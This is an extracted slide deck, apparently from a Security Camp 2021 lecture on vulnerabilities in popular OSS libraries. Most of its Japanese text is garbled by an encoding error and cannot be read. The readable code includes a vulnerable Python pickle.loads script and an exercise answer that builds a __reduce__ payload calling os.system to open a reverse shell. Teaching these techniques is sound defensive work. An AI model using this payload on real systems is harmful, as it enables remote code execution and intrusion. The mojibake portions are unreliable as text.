趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

Slide 1

Slide 1 text

झຯͱ࣮ӹͷͨΊͷ ஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯ גࣜձࣾΞΧπΩ খ஛ɹହҰ

Slide 2

Slide 2 text

ࣗݾ঺հ w খ஛ɹହҰ w (JU)VC5XJUUFSULNSV w ॴଐגࣜձࣾΞΧπΩ w ੬ऑੑ਍அ w νʔτରࡦπʔϧ։ൃͳͲ

Slide 3

Slide 3 text

ࣗݾ঺հ ஶॻ

Slide 4

Slide 4 text

ηΩϡϦςΟɾΩϟϯϓͱͳ͔Α͠ʂ w ηΩϡϦςΟɾΩϟϯϓશࠃେձࢀՃ w ηΩϡϦςΟɾϛχΩϟϯϓJOژ౎νϡʔλʔ w ηΩϡϦςΟɾϛχΩϟϯϓJOਆށνϡʔλʔ w ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ w ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ ࣗݾ঺հ

Slide 5

Slide 5 text

#MBDL)BU"STFOBMͱ΋ͳ͔Α͠ʢʁʣ w #MBDL)BU64""STFOBM w "OESPJEΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮBQLNFEJUʯΛൃද w #MBDL)BU64""STFOBM w J04ΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮJQBNFEJUʯΛൃද w #MBDL)BU&VSPQF"STFOBM w 5#" ࣗݾ঺հ

Slide 6

Slide 6 text

ຊ೔ͷߨٛʹ͍ͭͯ w ԋश؀ڥߏஙͷͨΊͷίϚϯυͷ৘ใ͕εϥΠυʹࡌ͍ͬͯΔͷͰίϐϖͰ ߏஙͰ͖ΔΑ͏ʹεϥΠυ͸4MBDL্Ͱ഑෍ͯ͋͠Γ·͢ w ԋशͷͱ͖͸֤ࣗͰεϥΠυ͔͞ͷ΅Γͭͭ΍ͬͯ΋Β͑Δͱ🙏 w ޙ೔ެ։൛Λ4QFBLFS%FDLͰެ։͢ΔͷͰݟֶ࿮ͷਓͨͪ͸ ଴͍ͬͯͯͩ͘͞🙇 w (JU)VCϦϙδτϦ w IUUQTHJUIVCDPNULNSVTFDDBNQC

Slide 7

Slide 7 text

ຊ೔ͷߨٛʹ͍ͭͯ

Slide 8

Slide 8 text

ຊ೔ͷߨٛʹ͍ͭͯ ӕͰ͢ʢҰ෦ʣ

Slide 9

Slide 9 text

ຊ೔ͷߨٛʹ͍ͭͯ w ߨٛ֓ཁΛߟ͑ͨͷ͸໿ϲ݄લʜ w ౰࣌͸9.-ύʔαʹओ࣠Λ͓͍ͨߨٛΛ͠Α͏ͱࢥ͍ͬͯͨ w ͋ͱͰߟ͑௚͢ͱগ͠είʔϓ͕ڱ͍ w ͱ͍͏͜ͱͰɺѻ͏੬ऑੑΛ૿΍͍ͯ͠·͢ʂ

Slide 10

Slide 10 text

ͦ΋ͦ΋੬ऑੑͱ͸ w ιϑτ΢ΣΞʹ͓͚ΔηΩϡϦςΟ্ͷ໰୊Օॴ w ιϑτ΢ΣΞͷྫϥΠϒϥϦɺ04ɺ8FCΞϓϦέʔγϣϯͳͲ w ໰୊ՕॴΛ߈ܸ͞ΕΔ͜ͱͰɺຊདྷͷػೳΛଛͳ͍ɺϢʔβ͕ෆརӹΛඃΔ w ৘ใͷ࿙ӮͳͲ w ˠ੬ऑੑΛ߈ܸऀΑΓૣ͘ൃݟͯ͠मਖ਼͍ͯ͘͠ඞཁ͕͋Δʂʂ

Slide 11

Slide 11 text

ຊ೔ͷߨٛͷྲྀΕ w ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢલ࠲ʣ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w 9.-ύʔαʹର͢Δ߈ܸख๏ w ٕज़ͱ޲͖߹͏࢟੎ͷ࿩ʢ͍͍࿩ʣ

Slide 12

Slide 12 text

ୈ̍ষ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε

Slide 13

Slide 13 text

ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε w اۀͰߦΘΕΔ੬ऑੑ਍அ w ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ

Slide 14

Slide 14 text

اۀͰߦΘΕΔ੬ऑੑ਍அ w ηΩϡϦςΟΤϯδχΞ͕੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱΛ੬ऑੑ਍அͱ͍͏ w αʔϏεͷϦϦʔεલ΍ɺ௥ՃͰେ͖ͳػೳΛ࣮૷ͨ͠ࡍʹߦΘΕΔ w 8FCΞϓϦέʔγϣϯ΍εϚϗΞϓϦɺ*P5ػثͳͲ͕ର৅ w ηΩϡϦςΟϕϯμʹ֎஫ɺ·ͨ͸಺੡Ͱ࣮ࢪ͞ΕΔ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̍ʣ

Slide 15

Slide 15 text

اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ੬ऑੑΛൃݟ͢Δʹ͸༷ʑͳ؍఺͕͋Δ͕ɺΞϓϦέʔγϣϯͱαʔόؒͷ ௨৴Λ֬ೝɾվ͟Μ͢Δ͜ͱͰൃݟͰ͖Δ੬ऑੑ͕ଟ͍ ϓϩΩγπʔϧΛ࢖ͬͯ௨৴಺༰Λ֬ೝ͢Δ ηΩϡϦςΟΤϯδχΞ αʔό ਍அର৅

Slide 16

Slide 16 text

اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ηΩϡϦςΟΤϯδχΞ͕ݟ͚ͭͨ੬ऑੑΛ։ൃऀʹใࠂ w ։ൃऀ͕ΞϓϦέʔγϣϯΛमਖ਼ ηΩϡϦςΟΤϯδχΞ ใࠂΛड͚ͯ੬ऑੑΛमਖ਼͢Δ։ൃऀ ηΩϡΞͳঢ়ଶͰαʔϏεΛϦϦʔε

Slide 17

Slide 17 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ݚڀ໨తͰ͋ͬͨΓझຯͰ͋ͬͨΓͰɺੈͷதʹެ։͞Ε͍ͯΔιϑτ΢Σ Ξͷ੬ऑੑΛউखʹݟ͚ͭΔਓ͕͍ͨͪΔ w ൃݟͨ͠੬ऑੑ͕ެ։͞ΕΔͱݟ͚ͭͨਓͷ੒ՌͱͳΔͷͰ͏Ε͍͠ w ͓ۚ💰͕΋Β͑Δ੍౓΋͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̎ʣ

Slide 18

Slide 18 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂऀʹใ঑ۚΛ౉͢όάό΢ϯςΟ w ࣗࣾͷ੡඼ͷ੬ऑੑΛใࠂͯ͘͠Εͨਓʹ੬ऑੑͷӨڹ౓ʹ४ͯ͡ใ঑ۚΛ ౉੍͢౓ w ੬ऑੑΛѱ༻͞ΕΔΑΓɺใ঑ۚΛ͔͚ͯͰ΋ใࠂͯ͠΋Βͬͨ΄͏͕͍͍ w ੬ऑੑ਍அͱҧͬͯຊ൪؀ڥʹ߈ܸߦҝ͕ߦΘΕΔ w اۀ͕ηΩϡϦςΟରࡦʹ஫ྗ͍ͯ͠Δ͜ͱͷ13ʹ΋ͭͳ͕Δ

Slide 19

Slide 19 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ஶ໊όάό΢ϯςΟαʔϏε w )BDLFS0OF w 4UBSCVDLTɺ/JOUFOEPɺ-*/&ɺ50:05"ͳͲ w CVHDSPXE w *OEFFEɺ/FUqJYɺ5FTMBɺ.BTUFSDBSEͳͲ w #VH#VOUZKQ w $IBUXPSLɺCJUCBOLͳͲ

Slide 20

Slide 20 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ w όάό΢ϯςΟΛ΍͍ͬͯͳ͍αʔϏε΍ɺ044ͷιϑτ΢ΣΞͷ੬ऑੑΛ ݟ͚ͭͯ͠·͏ʢݟ͚͍ͭͨʢʁʣʣ͜ͱ΋͋Δ w ͦΜͳͱ͖͸*1"ʹใࠂ͢Δͱ։ൃऀ΁ͷ࿈བྷΛߦͬͯ͘ΕΔ w ੬ऑੑؔ࿈৘ใͷಧग़ड෇ ʢIUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUʣ w ։ൃऀͱ௚઀΍ΓऔΓ͢ΔͱᎍΊΔՄೳੑ͕͋Δ

Slide 21

Slide 21 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

Slide 22

Slide 22 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂͨ͠੬ऑੑʹ$7&͕ͭ͘͜ͱ΋ w $7&ʢ$PNNPO7VMOFSBCJMJUJFTBOE&YQPTVSFTʣɿڞ௨੬ऑੑࣝผࢠ w .*53&͕ࣾ৘ใڞ༗ͷͨΊʹ֤੬ऑੑʹݻ༗ͷ$7&*%ΛׂΓৼ͍ͬͯΔ w ੲɺ֤छ੡඼ϕϯμʔ΍ηΩϡϦςΟϕϯμʔ͕ɺ੬ऑੑʹରͯ͠ಠࣗʹ ໊લΛ෇͚͍ͯͨ w ೥ʹ$7&͕ొ৔͠ɺ੬ऑੑ৘ใͷൺֱΛ༰қʹߦ͑ΔΑ͏ʹͳͬͨ w ݟ͚ͭͨ੬ऑੑʹ$7&͕ͭ͘ͱࣗຫͰ͖Δ

Slide 23

Slide 23 text

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ੬ऑੑʹ$7&͕ͭ͘·ͰͷྲྀΕ w ೔ຊͰ͸*1"ͱ+1$&35$$͕.*53&ࣾͱ࿈ܞͯ͠ݟ͔ͭͬͨ੬ऑੑʹରͯ͠ $7&Λ࠾൪͢ΔऔΓ૊ΈΛߦ͍ͬͯΔ

Slide 24

Slide 24 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ͜͜·Ͱݟ͖ͯͨͱ͓Γɺ੬ऑੑ͸೔ʑൃݟ͞Ε͍ͯΔ w ੬ऑੑͷ͋Διϑτ΢ΣΞΛ༻͍͍ͯΔ͚ͩͰ੬ऑੑͱͳΓ͏Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ IUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUWVMORIUNM

Slide 25

Slide 25 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ਵ࣌ൃݟ͞ΕΔϥΠϒϥϦ΍04౳ͷ੬ऑੑʹ͸ϦϦʔεલʹ࣮ࢪ͢Δ ੬ऑੑ਍அͰ͸ରԠͰ͖ͳ͍ w ӡ༻޻ఔͰ੬ऑੑͷରԠΛ͢Δඞཁ͕͋Δ w ੬ऑੑͷରࡦํ๏͕ެ։͞ΕΔલʹɺ߈ܸ͕ߦΘΕΔ͜ͱ΋͋ΔʢθϩσΠ ߈ܸʣ w Өڹ౓͕ߴ͍੬ऑੑ͕ެ։͞Εͨ৔߹͸ਝ଎ʹରԠ͢Δඞཁ͕͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ

Slide 26

Slide 26 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ӡ༻࣌ʹ੬ऑੑͷ͋Διϑτ΢ΣΞ͕͋Ε͹Ξοϓσʔτ͍͖͍ͯͨ͠ w ˠαʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w ˠίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ

Slide 27

Slide 27 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ αʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w 7VMTʢ76-OFSBCJMJUZ4DBOOFSʣ w IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT w ϑϡʔνϟʔגࣜձ͕ࣾ։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w αʔό಺Ͱ༻͍͍ͯΔιϑτ΢ΣΞʹ੬ऑੑΛؚΉόʔδϣϯͷ΋ͷ͕ͳ͍͔ ֬ೝ

Slide 28

Slide 28 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 7VMTͷ࢓૊Έ IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT

Slide 29

Slide 29 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ w "RVB4FDVSJUZ͕։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w IUUQTHJUIVCDPNBRVBTFDVSJUZUSJWZ w %PDLFSΠϝʔδΛεΩϟϯͰ͖Δ w ϝϯς͞Ε͍ͯͳ͍ެࣜ%PDLFSΠϝʔδ΋ଟ͍ w "4JNQMFBOE$PNQSFIFOTJWF7VMOFSBCJMJUZ4DBOOFSGPS$POUBJOFST 4VJUBCMFGPS$* w $*ʹ૊ΈࠐΉ͜ͱ΋Ͱ͖ͯศར

Slide 30

Slide 30 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ Ϋϥ΢υ؀ڥͷઃఆ΋νΣοΫ͍ͨ͠ w "84΍($1ͷઃఆϛεʹΑΔ੬ऑੑ΋͋Δ w ೔ʑɺΠϯϑϥͷઃఆ͸มΘ͍ͬͯ͘ͷͰɺϦϦʔεલͷ੬ऑੑ਍அͰ͸ ๷͛ͳ͍ w ੬ऑͳ෦෼Λ߈ܸऀ͸CPUΛ༻͍ͯߴ଎ʹ୳ͯ͘͠Δ

Slide 31

Slide 31 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 4όέοτ͸Α͘ૂΘΕ͍ͯΔ w Α͘ૂΘΕ͍ͯΔ"84ͷ࢓૊Έͷͻͱͭʹ4όέοτ͕͋Δ w ਖ਼໊ࣜশ"NB[PO4 "NB[PO4JNQMF4UPSBHF4FSWJDF w Πϯλʔωοτܦ༝Ͱར༻Ͱ͖ΔετϨʔδαʔϏε w 4όέοτσʔλͷஔ͖৔ॴ w ੩తϑΝΠϧϗεςΟϯά͕Ͱ͖8FCαʔόͱͯ͠΋࢖༻Ͱ͖Δ w ༷ʑͳσʔλ͕ஔ͔ΕΔͷͰɺσʔλ͕ཉ͍͠߈ܸऀʹૂΘΕΔ

Slide 32

Slide 32 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ࡢࠓͷΠϯγσϯτࣄྫ w 4όέοτઃఆϛεʹΑΔԯສੈଳҎ্ͷݸਓ৘ใ࿙Ӯ w ΧϦϑΥϧχΞΛڌ఺ͱ͢Δσʔλ෼ੳձࣾͰ͋Δ"MUFSZY͔ࣾΒͷ࿙Ӯ w IUUQTXXXUSFOENJDSPDPNWJOGPQMTFDVSJUZOFXTWJSUVBMJ[BUJPOBOEDMPVEEBUBPONJMMJPOVT IPVTFIPMETFYQPTFEEVFUPNJTDPOpHVSFEBXTTCVDLFU w ެ։4όέοτΛɺϚϧ΢ΣΞΛ࢓ࠐΜͩঢ়ଶͰ্ॻ͖͢Δ߈ܸऀ w ޡͬͯॻ͖ࠐΈΛڐՄ͞Ε͍ͯΔόέοτʹϚϧ΢ΣΞΛॻ͖ࠐΈ w IUUQTXXXNDBGFFDPNCMPHTFOUFSQSJTFDMPVETFDVSJUZNDBGFFEJTDPWFSTHIPTUXSJUFSBQFSWBTJWFBXTT NBOJOUIFNJEEMFFYQPTVSF

Slide 33

Slide 33 text

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ "84$POpH w "84ͷ֤छઃఆ͕ϧʔϧͲ͓Γʹઃఆ͞Ε͍ͯΔ͔ධՁ͢ΔαʔϏε w ެ։͞Ε͍ͯΔηΩϡϦςΟάϧʔϓ͕ଘࡏ͠ͳ͍͔ʁ w 4όέοτ͕ެ։ઃఆʹͳ͍ͬͯͳ͍͔ʁ w ެ։͞Ε͍ͯΔ3%4εφοϓγϣοτ͕ଘࡏ͠ͳ͍͔ʁ

Slide 34

Slide 34 text

ͲͷΑ͏ͳ੬ऑੑ͕ݟ͔ͭΔͷ͔

Slide 35

Slide 35 text

08"415PQ 08"41ͱ͸ w 08"41ʢ0QFO8FC"QQMJDBUJPO4FDVSJUZ1SPKFDUʣ͸ηΩϡϦςΟͷ ܒ໤ͱීٴΛ໨తͱͨ͠/10ஂମ w ੈքதʹڌ఺͕͋Δ w ೔ຊʹ΋͋ͬͯυΩϡϝϯτΛެ։ͨ͠ΓษڧձΛओ࠵ͨ͠Γ͍ͯ͠Δ w IUUQTPXBTQPSHXXXDIBQUFSKBQBO w 08"415PQ͸8FCΞϓϦέʔγϣϯʹ͓͍ͯ Α͘ݟ͔ͭΔ੬ऑੑϥϯΩϯά

Slide 36

Slide 36 text

08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΠϯδΣΫγϣϯ߈ܸ w ೝূͷෆඋ w ػඍͳ৘ใͷ࿐ग़ w 99& w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳηΩϡϦςΟઃఆ w 944 w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτ ͷ࢖༻ w ෆे෼ͳϩΪϯάͱϞχλϦϯά

Slide 37

Slide 37 text

08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ IUUQTHJUIVCDPN08"415PQCMPCNBTUFSEPDT"@@*OUSPEVDUJPONE

Slide 38

Slide 38 text

08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳ҉߸Խ w ΠϯδΣΫγϣϯ w ҆શͰͳ͍ઃܭ w ෆద੾ͳηΩϡϦςΟઃఆ w ੬ऑͳݹ͍ίϯϙʔωϯτ w ෆద੾ͳ*EFOUJpDBUJPOͱ "VUIFOUJDBUJPO w ιϑτ΢ΣΞͱσʔλͷ੔߹ͷෆඋ w ηΩϡϦςΟϩάͱϞχλϦϯάͷෆ උ w αʔόʔαΠυϦΫΤετϑΥʔδΣϦ ʢ443'ʣ

Slide 39

Slide 39 text

ߨٛͰѻ͏੬ऑੑ w ୊झຯͱ࣮ӹͷͨΊͷஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ w 044ϥΠϒϥϦىҼͱ͍ͬͯ΋෯޿͍ʜ w ֤ϓϩάϥϛϯάݴޠʹσϑΥϧτͰଘࡏ͢ΔϥΠϒϥϦىҼͷ੬ऑੑʹয ఺Λ౰ͯΔˠ࡞Γࠐ·Ε΍͍͢ʂʂ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w 9.-ύʔαؔ࿈

Slide 40

Slide 40 text

08"415PQ 08"41ʹΑΔ΍ΒΕ؀ڥ w 08"41͸੬ऑੑΛ࡞Γࠐ·Εͨԋश༻ͷΞϓϦͷެ։΋͍ͯ͠Δ w +VJDF4IPQʢIUUQTHJUIVCDPNCLJNNJOJDIKVJDFTIPQʣ w 3BJMT(PBUʢIUUQTHJUIVCDPN08"41SBJMTHPBUʣ w %74"ʢIUUQTHJUIVCDPN08"41%74"ʣ w ͳͲ w ษڧʹͳΔͷͰ΍ͬͯΈ͍ͯͩ͘͞ʂ

Slide 41

Slide 41 text

ୈ̎ষ ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

Slide 42

Slide 42 text

γϦΞϥΠζͱσγϦΞϥΠζ γϦΞϥΠζͱ͸ w γϦΞϥΠζ ഑ྻ΍ΫϥεͳͲͷΦϒδΣΫτΛόΠτྻܗࣜͷσʔλ΁มߋ͢Δ͜ͱ w σγϦΞϥΠζʢΞϯγϦΞϥΠζʣ γϦΞϥΠζ͞ΕΔ͜ͱʹΑͬͯੜ੒͞ΕͨόΠτྻܗࣜͷσʔλΛ ΦϒδΣΫτ΁໭͢͜ͱ w ༻్ ෳࡶͳσʔλ΍ΦϒδΣΫτͳͲͷεφοϓγϣοτΛऔΔ ϑΝΠϧ΍%#ʹอଘ͢Δࡍ΍ɺωοτϫʔΫΛ௨ͯ͡ૹ৴͢ΔͳͲ

Slide 43

Slide 43 text

1ZUIPOͰͷγϦΞϥΠζσγϦΞϥΠζ w QJDLMFϞδϡʔϧͷQJDLMFEVNQT ɺQJDLMFMPBET ͳͲͰ γϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ { 'name': 'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ', 'year': 2021, 'place': ‘online' } b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94( \x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3 \x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\ x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x 83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xb c\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\ xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05p lace\x94\x8c\x06online\x94u.’

Slide 44

Slide 44 text

1)1ͰͷγϦΞϥΠζσγϦΞϥΠζ w ඪ४ؔ਺ͷTFSJBMJ[F ͱVOTFSJBMJ[F ͰγϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ array( 'name'=>'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ’, 'year'=>2021, 'place'=>'online' ) a:3:{s:4:"name";s:65:"ηΩϡϦςΟɾΩϟϯϓશࠃେձ 2021 ΦϯϥΠ ϯ”;s:4:”year";i:2021;s:5:"place";s:6:"online";}

Slide 45

Slide 45 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ Ϣʔβ͔Βͷೖྗ஋͸ཁ஫ҙ w Ϣʔβ͔Βͷೖྗ஋Λͦͷ··σγϦΞϥΠζ͍ͯ͠Δͱɺ ੜ੒͞ΕΔΦϒδΣΫτΛϢʔβ͕ίϯτϩʔϧͰ͖ͯ͠·͏ ࡉ޻͞ΕͨσʔλΛૹ৴ ߈ܸऀ͕ࢦఆͨ͠ ΦϒδΣΫτ͕ੜ੒͞ΕΔ

Slide 46

Slide 46 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ϚδοΫϝιουΛ࢖͏ w ϚδοΫϝιουಛఆͷΠϕϯτ࣌ʹ҉໧తʹ࣮ߦ͞ΕΔϝιου w ϓϩάϥϛϯάݴޠ಺෦Ͱ࣮ߦ͞Ε͍ͯΔ w ֤ݴޠʹΑͬͯҟͳΔ w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹݺͼग़͞ΕΔϚδοΫϝιουΛ߈ܸʹར༻Մೳ w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹ࣮ߦ͢ΔίʔυΛࢦఆͰ͖Δ w ˠϢʔβ͕೚ҙίʔυΛ࣮ߦՄೳʂ

Slide 47

Slide 47 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1ZUIPOެࣜυΩϡϝϯτ IUUQTEPDTQZUIPOPSHKBMJCSBSZQJDLMFIUNM

Slide 48

Slide 48 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1)1ެࣜυΩϡϝϯτ IUUQTXXXQIQOFUNBOVBMKBGVODUJPOVOTFSJBMJ[FQIQ

Slide 49

Slide 49 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ۩ମతͳ߈ܸํ๏ʢ1ZUIPOͷ৔߹ʣ w 1ZUIPOͰγϦΞϥΠζσγϦΞϥΠζ͸QJDLMFԽVOQJDLMFԽͱݺ͹Ε͍ͯΔ w QJDLMFEVNQT Λ࢖ͬͯΦϒδΣΫτΛQJDLMFԽ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ͠@@SFEVDF@@ ϝιου͕஌ΒΕ͍ͯΔ w ݺͼग़͠ՄೳͳΦϒδΣΫτͱҾ਺Λλϓϧͱͯ͠ࢦఆ͢Δͱ࣮ߦͯ͘͠ΕΔ w ˠ@@SFEVDF@@ ϝιουͰPTTZTUFN Λ࣮ߦ͢ΔΦϒδΣΫτΛQJDLMFԽͯ͠ ૹ৴͢Δ͜ͱͰ೚ҙίʔυ࣮ߦʹ࣋ͪࠐΊΔʂ

Slide 50

Slide 50 text

ࣄલ՝୊݉બߟ՝୊& w 1ZUIPOʹ͸QJDLMFͱ͍͏ඪ४Ϟδϡʔϧ͕͋Γ·͢ɻQJDLMFͷެࣜυΩϡϝϯτʹهࡌ͞ Ε͍ͯΔΑ͏ʹɺQJDLMFͰ৴པͰ͖ͳ͍஋ΛσγϦΞϥΠζ͢Δ͜ͱ͸੬ऑੑͷݪҼͱͳ Γಘ·͢ɻͦͷཧ༝͓Αͼ߈ܸख๏ʹ͍ͭͯɺҎԼͷখ໰ ʹճ౴͍ͯͩ͘͠͞ɻ w খ໰ Կނɺ੬ऑੑͱͳΔͷ͔Λઆ໌͍ͯͩ͘͠͞ʢඞਢճ౴ʣ w খ໰ ҎԼͷ1ZUIPOͷιʔείʔυʹ͸্هͷ੬ऑੑ͕ଘࡏ͠·͢ɻ ͜ͷ੬ऑੑΛ༻͍ͯɺ5$1ͷ൪ϙʔτʹର͢ΔϦόʔεγΣϧΛ࡞੒͍ͯͩ͘͠͞ɻ OFUDBUͰ൪ϙʔτΛ଴ͪड͚͓͖ͯɺ઀ଓཱ͕֬ͨ͠ޙɺMTͳͲͷίϚϯυΛଧͪࠐ Έ݁Ռ͕ฦͬͯ͘Ε͹ਖ਼ղͰ͢ɻʢҰ෦লུʣʢඞਢճ౴ʣ ໰୊จ

Slide 51

Slide 51 text

બߟ՝୊& #!/usr/bin/env python3 # coding: UTF-8 import sys import base64 import pickle args = sys.argv if len(args) != 2: print('ୈҰҾ਺ʹBase64Τϯίʔυ͞ΕͨจࣈྻΛࢦఆ͍ͯͩ͘͠͞') try: data = base64.urlsafe_b64decode(args[1]) deserialized = pickle.loads(data) print('deserialized: {0}'.format(deserialized)) except: print('Failed to deserialize') ໰୊ίʔυ

Slide 52

Slide 52 text

બߟ՝୊&ղઆ w λʔήοτͷ୺຤͔Β߈ܸऀ͕଴ͪड͚͍ͯΔ୺຤΁ͱ઀ଓ͠ʹ͍͘͜ͱ Ͱɺ߈ܸऀ͕λʔήοτͷ୺຤্Ͱಈ࡞͢ΔγΣϧΛૢ࡞Ͱ͖ΔΑ͏ʹ͢Δ ςΫχοΫΛϦόʔεγΣϧͱݺͿ ϦόʔεγΣϧͱ͸ ԿΒ͔ͷํ๏ͰϦόʔεγΣϧΛߦ͏ίʔυΛ࣮ߦͤ͞Δ ߈ܸऀ͕଴ͪड͚Δ୺຤ʹ઀ଓ ೚ҙίʔυΛ࣮ߦ

Slide 53

Slide 53 text

બߟ՝୊&ղઆ w αʔό্Ͱ೚ҙίʔυ࣮ߦʹ੒ޭͨ͠ͱͯ͠΋݁Ռ͕Ϩεϙϯε΍6*্ʹग़ͯ ͘Δͱ͸ݶΒͳ͍ɻ w ϦόʔεγΣϧʹΑͬͯ೚ҙίʔυ࣮ߦͷ݁ՌΛ֬ೝͰ͖Δ ϦόʔεγΣϧͷ༻్ ೚ҙίʔυ࣮ߦͰ͖Δ͔΋͠Εͳ͍ίʔυ

Slide 54

Slide 54 text

બߟ՝୊&ղઆ w ୈҰҾ਺ʹࢦఆ͞Εͨ#BTFจࣈྻΛσίʔυ্ͨ͠ͰVOQJDLMFԽ͍ͯ͠Δ w QJDLMFԽ্ͨ͠Ͱ#BTFʹΤϯίʔυͨ͠จࣈྻΛࢦఆ͢Δ͜ͱͰ VOQJDLMF࣌ʹੜ੒͞ΕΔΦϒδΣΫτΛ੍ޚͰ͖Δ w ϚδοΫϝιουΛ࢖ͬͯϦόʔεγΣϧΛੜ੒͢ΔίʔυΛ࣮ߦ͢Ε͹ ղ͚Δ ํ਑

Slide 55

Slide 55 text

બߟ՝୊&ղઆ #!/usr/bin/env python3 # coding: UTF-8 import pickle import socket import os import base64 class GetReverseShell(object): def __reduce__(self): return (os.system, ('/bin/sh &0 2>&0',)) payload = pickle.dumps(GetReverseShell()) print(base64.urlsafe_b64encode(payload)) ϖΠϩʔυੜ੒

Slide 56

Slide 56 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ରࡦ w ۃྗγϦΞϥΠζσγϦΞϥΠζΛߦΘͳ͍Α͏ʹ͢Δ w ୅ΘΓʹ+40/΍:".-ͳͲͷϑΥʔϚοτΛར༻͢Δ w γϦΞϥΠζσγϦΞϥΠζΛߦ͏ඞཁ͕͋Δ৔߹͸ɺσδλϧॺ໊Λ෇༩ ͠ɺվ͟ΜͰ͖ͳ͍Α͏ʹ͢Δ

Slide 57

